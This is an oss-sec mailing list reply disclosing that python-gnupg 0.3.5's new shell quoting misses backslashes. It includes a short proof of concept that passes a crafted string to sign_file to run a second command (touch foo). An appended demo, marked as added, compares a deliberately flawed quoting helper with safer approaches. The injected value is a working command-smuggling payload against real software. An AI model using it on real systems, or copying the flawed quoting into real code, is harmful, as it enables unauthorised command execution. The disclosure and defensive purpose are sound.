oss-sec mailing list archives
Re: CVE request: python-gnupg before 0.3.5 shell injection
From: Matthew Daley <mattd () bugfuzz com>
Date: Tue, 4 Feb 2014 23:27:34 +1300
On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri () nerv fi> wrote:
> On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote:
>> python-gnupg 0.3.5 lists in the changelog:
>> "Added improved shell quoting to guard against shell injection."
>>
>> Sounds like a severe security issue, but further info is lacking.
>
> Diff attached. New function shell_quote() seems to represent major changes to
> shell input quoting against unsafe input. [...]

This appears to (at least) miss escaping of backslashes:

    $ ls foo
    ls: cannot access foo: No such file or directory
    $ python
    Python 2.7.6 (default, Jan 11 2014, 14:34:26)
    [GCC 4.8.2] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import gnupg
    >>> gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'")
    <gnupg.Sign object at 0x7fb3dbfad7d0>
    $ ls foo
    foo

- Matthew
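Added example, not part of the original post and not python-gnupg's code: a round-trip check that shows why a quoting helper which leaves backslashes unescaped fails on input like the one above, next to two safer ways of passing the same string. naive_quote() is a hypothetical stand-in (the post does not show shell_quote() itself), SAMPLE and its harmless echo marker are constructed, and a POSIX /bin/sh is assumed.

```python
import shlex
import subprocess
import sys

# Constructed test input modelled on the string in the post; the trailing
# command is a harmless echo used only as a visible marker.
SAMPLE = "'\\\"; echo INJECTED #'"


def naive_quote(s):
    """Hypothetical quoting helper (not python-gnupg's shell_quote()):
    wraps in double quotes and escapes '"' but not the backslash."""
    return '"%s"' % s.replace('"', '\\"')


def via_shell(quote, s):
    """Return what /bin/sh prints when handed quote(s) as one printf argument."""
    cmd = "printf '%s' " + quote(s)
    return subprocess.run(["/bin/sh", "-c", cmd], capture_output=True,
                          text=True, check=False).stdout


def via_argv(s):
    """Pass s as one argv element; no shell parses it at all."""
    child = "import sys; sys.stdout.write(sys.argv[1])"
    return subprocess.run([sys.executable, "-c", child, s],
                          capture_output=True, text=True, check=True).stdout


def roundtrips(quote, s):
    """A quoting helper is only safe if the shell hands back s unchanged."""
    return via_shell(quote, s) == s


if __name__ == "__main__":
    print("naive_quote :", repr(via_shell(naive_quote, SAMPLE)))
    print("shlex.quote :", repr(via_shell(shlex.quote, SAMPLE)))
    print("argv list   :", repr(via_argv(SAMPLE)))
```

With naive_quote() the backslash in the input escapes the helper's own added backslash, so the following double quote closes the string early and the shell runs the rest as a second command.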